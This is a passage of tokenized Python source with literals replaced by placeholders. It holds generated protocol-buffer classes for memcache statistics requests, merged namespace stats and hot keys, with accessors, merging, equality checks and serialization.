( self , contents = None ) : <EOL> pass <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> return n <EOL> def Clear ( self ) : <EOL> pass <EOL> def OutputUnchecked ( self , out ) : <EOL> pass <EOL> def OutputPartial ( self , out ) : <EOL> pass <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . 
skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> } , <NUM_LIT:0> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:0> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class MemcacheStatsRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_override_ = <NUM_LIT:0> <EOL> override_ = None <EOL> has_max_hotkey_count_ = <NUM_LIT:0> <EOL> max_hotkey_count_ = <NUM_LIT:0> <EOL> def __init__ ( self , contents = None ) : <EOL> self . lazy_init_lock_ = thread . allocate_lock ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def override ( self ) : <EOL> if self . override_ is None : <EOL> self . lazy_init_lock_ . acquire ( ) <EOL> try : <EOL> if self . override_ is None : self . override_ = AppOverride ( ) <EOL> finally : <EOL> self . lazy_init_lock_ . release ( ) <EOL> return self . override_ <EOL> def mutable_override ( self ) : self . has_override_ = <NUM_LIT:1> ; return self . override ( ) <EOL> def clear_override ( self ) : <EOL> if self . has_override_ : <EOL> self . has_override_ = <NUM_LIT:0> ; <EOL> if self . override_ is not None : self . override_ . Clear ( ) <EOL> def has_override ( self ) : return self . has_override_ <EOL> def max_hotkey_count ( self ) : return self . max_hotkey_count_ <EOL> def set_max_hotkey_count ( self , x ) : <EOL> self . has_max_hotkey_count_ = <NUM_LIT:1> <EOL> self . max_hotkey_count_ = x <EOL> def clear_max_hotkey_count ( self ) : <EOL> if self . 
has_max_hotkey_count_ : <EOL> self . has_max_hotkey_count_ = <NUM_LIT:0> <EOL> self . max_hotkey_count_ = <NUM_LIT:0> <EOL> def has_max_hotkey_count ( self ) : return self . has_max_hotkey_count_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_override ( ) ) : self . mutable_override ( ) . MergeFrom ( x . override ( ) ) <EOL> if ( x . has_max_hotkey_count ( ) ) : self . set_max_hotkey_count ( x . max_hotkey_count ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_override_ != x . has_override_ : return <NUM_LIT:0> <EOL> if self . has_override_ and self . override_ != x . override_ : return <NUM_LIT:0> <EOL> if self . has_max_hotkey_count_ != x . has_max_hotkey_count_ : return <NUM_LIT:0> <EOL> if self . has_max_hotkey_count_ and self . max_hotkey_count_ != x . max_hotkey_count_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( self . has_override_ and not self . override_ . IsInitialized ( debug_strs ) ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_override_ ) : n += <NUM_LIT:1> + self . lengthString ( self . override_ . ByteSize ( ) ) <EOL> if ( self . has_max_hotkey_count_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . max_hotkey_count_ ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_override_ ) : n += <NUM_LIT:1> + self . lengthString ( self . override_ . ByteSizePartial ( ) ) <EOL> if ( self . has_max_hotkey_count_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . max_hotkey_count_ ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_override ( ) <EOL> self . clear_max_hotkey_count ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> if ( self . has_override_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putVarInt32 ( self . 
override_ . ByteSize ( ) ) <EOL> self . override_ . OutputUnchecked ( out ) <EOL> if ( self . has_max_hotkey_count_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . max_hotkey_count_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_override_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putVarInt32 ( self . override_ . ByteSizePartial ( ) ) <EOL> self . override_ . OutputPartial ( out ) <EOL> if ( self . has_max_hotkey_count_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . max_hotkey_count_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_override ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if tt == <NUM_LIT:16> : <EOL> self . set_max_hotkey_count ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_override_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . override_ . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> if self . has_max_hotkey_count_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . max_hotkey_count_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . 
get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> koverride = <NUM_LIT:1> <EOL> kmax_hotkey_count = <NUM_LIT:2> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> } , <NUM_LIT:2> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:2> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class MergedNamespaceStats ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_hits_ = <NUM_LIT:0> <EOL> hits_ = <NUM_LIT:0> <EOL> has_misses_ = <NUM_LIT:0> <EOL> misses_ = <NUM_LIT:0> <EOL> has_byte_hits_ = <NUM_LIT:0> <EOL> byte_hits_ = <NUM_LIT:0> <EOL> has_items_ = <NUM_LIT:0> <EOL> items_ = <NUM_LIT:0> <EOL> has_bytes_ = <NUM_LIT:0> <EOL> bytes_ = <NUM_LIT:0> <EOL> has_oldest_item_age_ = <NUM_LIT:0> <EOL> oldest_item_age_ = <NUM_LIT:0> <EOL> def __init__ ( self , contents = None ) : <EOL> self . hotkeys_ = [ ] <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def hits ( self ) : return self . hits_ <EOL> def set_hits ( self , x ) : <EOL> self . has_hits_ = <NUM_LIT:1> <EOL> self . hits_ = x <EOL> def clear_hits ( self ) : <EOL> if self . has_hits_ : <EOL> self . has_hits_ = <NUM_LIT:0> <EOL> self . hits_ = <NUM_LIT:0> <EOL> def has_hits ( self ) : return self . has_hits_ <EOL> def misses ( self ) : return self . misses_ <EOL> def set_misses ( self , x ) : <EOL> self . has_misses_ = <NUM_LIT:1> <EOL> self . misses_ = x <EOL> def clear_misses ( self ) : <EOL> if self . has_misses_ : <EOL> self . has_misses_ = <NUM_LIT:0> <EOL> self . misses_ = <NUM_LIT:0> <EOL> def has_misses ( self ) : return self . 
has_misses_ <EOL> def byte_hits ( self ) : return self . byte_hits_ <EOL> def set_byte_hits ( self , x ) : <EOL> self . has_byte_hits_ = <NUM_LIT:1> <EOL> self . byte_hits_ = x <EOL> def clear_byte_hits ( self ) : <EOL> if self . has_byte_hits_ : <EOL> self . has_byte_hits_ = <NUM_LIT:0> <EOL> self . byte_hits_ = <NUM_LIT:0> <EOL> def has_byte_hits ( self ) : return self . has_byte_hits_ <EOL> def items ( self ) : return self . items_ <EOL> def set_items ( self , x ) : <EOL> self . has_items_ = <NUM_LIT:1> <EOL> self . items_ = x <EOL> def clear_items ( self ) : <EOL> if self . has_items_ : <EOL> self . has_items_ = <NUM_LIT:0> <EOL> self . items_ = <NUM_LIT:0> <EOL> def has_items ( self ) : return self . has_items_ <EOL> def bytes ( self ) : return self . bytes_ <EOL> def set_bytes ( self , x ) : <EOL> self . has_bytes_ = <NUM_LIT:1> <EOL> self . bytes_ = x <EOL> def clear_bytes ( self ) : <EOL> if self . has_bytes_ : <EOL> self . has_bytes_ = <NUM_LIT:0> <EOL> self . bytes_ = <NUM_LIT:0> <EOL> def has_bytes ( self ) : return self . has_bytes_ <EOL> def oldest_item_age ( self ) : return self . oldest_item_age_ <EOL> def set_oldest_item_age ( self , x ) : <EOL> self . has_oldest_item_age_ = <NUM_LIT:1> <EOL> self . oldest_item_age_ = x <EOL> def clear_oldest_item_age ( self ) : <EOL> if self . has_oldest_item_age_ : <EOL> self . has_oldest_item_age_ = <NUM_LIT:0> <EOL> self . oldest_item_age_ = <NUM_LIT:0> <EOL> def has_oldest_item_age ( self ) : return self . has_oldest_item_age_ <EOL> def hotkeys_size ( self ) : return len ( self . hotkeys_ ) <EOL> def hotkeys_list ( self ) : return self . hotkeys_ <EOL> def hotkeys ( self , i ) : <EOL> return self . hotkeys_ [ i ] <EOL> def mutable_hotkeys ( self , i ) : <EOL> return self . hotkeys_ [ i ] <EOL> def add_hotkeys ( self ) : <EOL> x = MemcacheHotKey ( ) <EOL> self . hotkeys_ . append ( x ) <EOL> return x <EOL> def clear_hotkeys ( self ) : <EOL> self . 
hotkeys_ = [ ] <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_hits ( ) ) : self . set_hits ( x . hits ( ) ) <EOL> if ( x . has_misses ( ) ) : self . set_misses ( x . misses ( ) ) <EOL> if ( x . has_byte_hits ( ) ) : self . set_byte_hits ( x . byte_hits ( ) ) <EOL> if ( x . has_items ( ) ) : self . set_items ( x . items ( ) ) <EOL> if ( x . has_bytes ( ) ) : self . set_bytes ( x . bytes ( ) ) <EOL> if ( x . has_oldest_item_age ( ) ) : self . set_oldest_item_age ( x . oldest_item_age ( ) ) <EOL> for i in xrange ( x . hotkeys_size ( ) ) : self . add_hotkeys ( ) . CopyFrom ( x . hotkeys ( i ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_hits_ != x . has_hits_ : return <NUM_LIT:0> <EOL> if self . has_hits_ and self . hits_ != x . hits_ : return <NUM_LIT:0> <EOL> if self . has_misses_ != x . has_misses_ : return <NUM_LIT:0> <EOL> if self . has_misses_ and self . misses_ != x . misses_ : return <NUM_LIT:0> <EOL> if self . has_byte_hits_ != x . has_byte_hits_ : return <NUM_LIT:0> <EOL> if self . has_byte_hits_ and self . byte_hits_ != x . byte_hits_ : return <NUM_LIT:0> <EOL> if self . has_items_ != x . has_items_ : return <NUM_LIT:0> <EOL> if self . has_items_ and self . items_ != x . items_ : return <NUM_LIT:0> <EOL> if self . has_bytes_ != x . has_bytes_ : return <NUM_LIT:0> <EOL> if self . has_bytes_ and self . bytes_ != x . bytes_ : return <NUM_LIT:0> <EOL> if self . has_oldest_item_age_ != x . has_oldest_item_age_ : return <NUM_LIT:0> <EOL> if self . has_oldest_item_age_ and self . oldest_item_age_ != x . oldest_item_age_ : return <NUM_LIT:0> <EOL> if len ( self . hotkeys_ ) != len ( x . hotkeys_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . hotkeys_ , x . hotkeys_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . 
has_hits_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_misses_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_byte_hits_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_items_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_bytes_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_oldest_item_age_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> for p in self . hotkeys_ : <EOL> if not p . IsInitialized ( debug_strs ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthVarInt64 ( self . hits_ ) <EOL> n += self . lengthVarInt64 ( self . misses_ ) <EOL> n += self . lengthVarInt64 ( self . byte_hits_ ) <EOL> n += self . lengthVarInt64 ( self . items_ ) <EOL> n += self . lengthVarInt64 ( self . bytes_ ) <EOL> n += <NUM_LIT:1> * len ( self . hotkeys_ ) <EOL> for i in xrange ( len ( self . hotkeys_ ) ) : n += self . lengthString ( self . hotkeys_ [ i ] . ByteSize ( ) ) <EOL> return n + <NUM_LIT:10> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_hits_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthVarInt64 ( self . hits_ ) <EOL> if ( self . has_misses_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthVarInt64 ( self . misses_ ) <EOL> if ( self . has_byte_hits_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthVarInt64 ( self . byte_hits_ ) <EOL> if ( self . has_items_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthVarInt64 ( self . 
items_ ) <EOL> if ( self . has_bytes_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthVarInt64 ( self . bytes_ ) <EOL> if ( self . has_oldest_item_age_ ) : <EOL> n += <NUM_LIT:5> <EOL> n += <NUM_LIT:1> * len ( self . hotkeys_ ) <EOL> for i in xrange ( len ( self . hotkeys_ ) ) : n += self . lengthString ( self . hotkeys_ [ i ] . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_hits ( ) <EOL> self . clear_misses ( ) <EOL> self . clear_byte_hits ( ) <EOL> self . clear_items ( ) <EOL> self . clear_bytes ( ) <EOL> self . clear_oldest_item_age ( ) <EOL> self . clear_hotkeys ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarUint64 ( self . hits_ ) <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarUint64 ( self . misses_ ) <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarUint64 ( self . byte_hits_ ) <EOL> out . putVarInt32 ( <NUM_LIT:32> ) <EOL> out . putVarUint64 ( self . items_ ) <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarUint64 ( self . bytes_ ) <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . put32 ( self . oldest_item_age_ ) <EOL> for i in xrange ( len ( self . hotkeys_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . hotkeys_ [ i ] . ByteSize ( ) ) <EOL> self . hotkeys_ [ i ] . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_hits_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarUint64 ( self . hits_ ) <EOL> if ( self . has_misses_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarUint64 ( self . misses_ ) <EOL> if ( self . has_byte_hits_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarUint64 ( self . byte_hits_ ) <EOL> if ( self . has_items_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:32> ) <EOL> out . putVarUint64 ( self . items_ ) <EOL> if ( self . has_bytes_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarUint64 ( self . 
bytes_ ) <EOL> if ( self . has_oldest_item_age_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . put32 ( self . oldest_item_age_ ) <EOL> for i in xrange ( len ( self . hotkeys_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . hotkeys_ [ i ] . ByteSizePartial ( ) ) <EOL> self . hotkeys_ [ i ] . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:8> : <EOL> self . set_hits ( d . getVarUint64 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT:16> : <EOL> self . set_misses ( d . getVarUint64 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_byte_hits ( d . getVarUint64 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT:32> : <EOL> self . set_items ( d . getVarUint64 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_bytes ( d . getVarUint64 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_oldest_item_age ( d . get32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . add_hotkeys ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_hits_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt64 ( self . hits_ ) ) <EOL> if self . has_misses_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt64 ( self . misses_ ) ) <EOL> if self . has_byte_hits_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt64 ( self . byte_hits_ ) ) <EOL> if self . has_items_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt64 ( self . items_ ) ) <EOL> if self . has_bytes_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt64 ( self . 
bytes_ ) ) <EOL> if self . has_oldest_item_age_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatFixed32 ( self . oldest_item_age_ ) ) <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . hotkeys_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % elm ) <EOL> res += e . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> cnt += <NUM_LIT:1> <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> khits = <NUM_LIT:1> <EOL> kmisses = <NUM_LIT:2> <EOL> kbyte_hits = <NUM_LIT:3> <EOL> kitems = <NUM_LIT:4> <EOL> kbytes = <NUM_LIT:5> <EOL> koldest_item_age = <NUM_LIT:6> <EOL> khotkeys = <NUM_LIT:7> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <EOL> <NUM_LIT:6> : "<STR_LIT>" , <EOL> <NUM_LIT:7> : "<STR_LIT>" , <EOL> } , <NUM_LIT:7> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:4> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:5> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:6> : ProtocolBuffer . Encoder . FLOAT , <EOL> <NUM_LIT:7> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:7> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class MemcacheHotKey ( ProtocolBuffer . 
ProtocolMessage ) : <EOL> has_key_ = <NUM_LIT:0> <EOL> key_ = "<STR_LIT>" <EOL> has_qps_ = <NUM_LIT:0> <EOL> qps_ = <NUM_LIT:0.0> <EOL> has_name_space_ = <NUM_LIT:0> <EOL> name_space_ = "<STR_LIT>" <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def key ( self ) : return self . key_ <EOL> def set_key ( self , x ) : <EOL> self . has_key_ = <NUM_LIT:1> <EOL> self . key_ = x <EOL> def clear_key ( self ) : <EOL> if self . has_key_ : <EOL> self . has_key_ = <NUM_LIT:0> <EOL> self . key_ = "<STR_LIT>" <EOL> def has_key ( self ) : return self . has_key_ <EOL> def qps ( self ) : return self . qps_ <EOL> def set_qps ( self , x ) : <EOL> self . has_qps_ = <NUM_LIT:1> <EOL> self . qps_ = x <EOL> def clear_qps ( self ) : <EOL> if self . has_qps_ : <EOL> self . has_qps_ = <NUM_LIT:0> <EOL> self . qps_ = <NUM_LIT:0.0> <EOL> def has_qps ( self ) : return self . has_qps_ <EOL> def name_space ( self ) : return self . name_space_ <EOL> def set_name_space ( self , x ) : <EOL> self . has_name_space_ = <NUM_LIT:1> <EOL> self . name_space_ = x <EOL> def clear_name_space ( self ) : <EOL> if self . has_name_space_ : <EOL> self . has_name_space_ = <NUM_LIT:0> <EOL> self . name_space_ = "<STR_LIT>" <EOL> def has_name_space ( self ) : return self . has_name_space_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_key ( ) ) : self . set_key ( x . key ( ) ) <EOL> if ( x . has_qps ( ) ) : self . set_qps ( x . qps ( ) ) <EOL> if ( x . has_name_space ( ) ) : self . set_name_space ( x . name_space ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_key_ != x . has_key_ : return <NUM_LIT:0> <EOL> if self . has_key_ and self . key_ != x . key_ : return <NUM_LIT:0> <EOL> if self . has_qps_ != x . has_qps_ : return <NUM_LIT:0> <EOL> if self . has_qps_ and self . qps_ != x . qps_ : return <NUM_LIT:0> <EOL> if self . has_name_space_ != x . 
has_name_space_ : return <NUM_LIT:0> <EOL> if self . has_name_space_ and self . name_space_ != x . name_space_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_key_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_qps_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . key_ ) ) <EOL> if ( self . has_name_space_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . name_space_ ) ) <EOL> return n + <NUM_LIT:10> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_key_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . key_ ) ) <EOL> if ( self . has_qps_ ) : <EOL> n += <NUM_LIT:9> <EOL> if ( self . has_name_space_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . name_space_ ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_key ( ) <EOL> self . clear_qps ( ) <EOL> self . clear_name_space ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . key_ ) <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putDouble ( self . qps_ ) <EOL> if ( self . has_name_space_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . name_space_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_key_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . key_ ) <EOL> if ( self . has_qps_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putDouble ( self . qps_ ) <EOL> if ( self . has_name_space_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . 
name_space_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_key ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_qps ( d . getDouble ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_name_space ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_key_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . key_ ) ) <EOL> if self . has_qps_ : res += prefix + ( "<STR_LIT>" % self . DebugFormat ( self . qps_ ) ) <EOL> if self . has_name_space_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . name_space_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kkey = <NUM_LIT:1> <EOL> kqps = <NUM_LIT:2> <EOL> kname_space = <NUM_LIT:3> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT:key>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> } , <NUM_LIT:3> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : 